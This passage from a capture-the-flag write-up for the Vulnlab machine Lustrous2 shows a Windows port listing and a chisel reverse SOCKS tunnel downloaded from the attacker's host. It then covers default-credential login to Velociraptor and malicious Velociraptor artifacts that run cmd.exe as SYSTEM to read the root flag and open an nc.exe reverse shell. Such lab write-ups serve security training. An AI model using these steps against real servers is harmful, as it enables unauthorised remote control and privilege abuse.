  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       372	InHost      
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4	InHost      
  TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING       2588	InHost      
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2516	InHost      
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4	InHost      
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       680	InHost      
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       568	InHost      
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       868	InHost      
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       680	InHost      
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       8	InHost      
  TCP    0.0.0.0:49674          0.0.0.0:0              LISTENING       680	InHost      
  TCP    0.0.0.0:49677          0.0.0.0:0              LISTENING       2064	InHost      
  TCP    0.0.0.0:49695          0.0.0.0:0              LISTENING       660	InHost      
  TCP    0.0.0.0:49696          0.0.0.0:0              LISTENING       680	InHost      
  TCP    0.0.0.0:49707          0.0.0.0:0              LISTENING       2432	InHost      
  TCP    0.0.0.0:49726          0.0.0.0:0              LISTENING       2196	InHost      
  TCP    0.0.0.0:55456          0.0.0.0:0              LISTENING       2128	InHost      
  TCP    10.10.71.5:53          0.0.0.0:0              LISTENING       2432	InHost      
  TCP    10.10.71.5:139         0.0.0.0:0              LISTENING       4	InHost      
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2432	InHost      
  TCP    127.0.0.1:8001         0.0.0.0:0              LISTENING       2588	InHost      
  TCP    127.0.0.1:8003         0.0.0.0:0              LISTENING       2588	InHost      
  TCP    127.0.0.1:8889         0.0.0.0:0              LISTENING       2588	InHost      

Found 8889/tcp so Velociraptor server is running

Set a proxy port forwarder:

Upload chisel on our Windows target:

c:\ProgramData>curl http://10.8.4.253/chisel.exe -o chisel.exe

Local:

$ ./chisel server -p 9999 --reverse &

Remote:

c:\ProgramData>.\chisel.exe client 10.8.4.253:9999 R:socks

Then configure our FoxyProxy extension in Firefox:

image

Then access to the Velociraptor GUI:

image

Ask for a username and password, we try administrator:administrator and admin:admin' but failed, try with operator:operator` (as 2nd account found previously):

image

Success

Create a malicious artifact to read the flag Lustrous2_Root:

name: Grab_The_Root_Flag
description: |
  This artifact allows running arbitrary commands through the system
  shell cmd.exe. The command is running as system and grab the admin flag

precondition:
  SELECT OS From info() where OS = 'windows'

parameters:
  - name: Command
    default: "more c:\\users\\administrator\\desktop\\root.txt"

sources:
  - query: |
      SELECT * FROM execve(argv=["cmd.exe", "/c", Command])

Go to View Artifacts:

Screenshot From 2025-02-01 10-23-06

Click on [+] to Add an Artifact:

Screenshot From 2025-02-01 10-23-25

image

Go to Hunt Manager:

Screenshot From 2025-02-01 10-29-21

Click on [+] to create a New Hunt:

Screenshot From 2025-02-01 10-30-11

Check the box Start Hunt Immediately:

image

Click on Select Artifacts and select our malicious one:

image

Then click on Launch:

Screenshot From 2025-02-01 10-42-02

After few seconds, we can show the output in the Notebook tab:

image

Found the last flag: VL{948164bdc2e92cc1eeb5699bbde09fa1}

We click on stop then delete to kill and destroy our hunt. Then we delete our artifact.

Another artifact can be created as below to gain a shell using our netcat uploaded before on the target:

name: Gain_a_Shell
description: |
  This artifact allows running arbitrary commands through the system
  shell cmd.exe. The command is running as system and grab the admin flag

precondition:
  SELECT OS From info() where OS = 'windows'

parameters:
  - name: Command
    default: "C:\\ProgramData\\nc.exe 10.8.4.253 4443 -e cmd"

sources:
  - query: |
      SELECT * FROM execve(argv=["cmd.exe", "/c", Command])

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=44f1e888-d06f-4da8-9d1e-0382cf101254

GW3xiZmXEAAwx5b

BloodHound.py update

This fork of bloodhound-python now works against Lustrous2, after a change I submitted to fix the Kerberos authentication: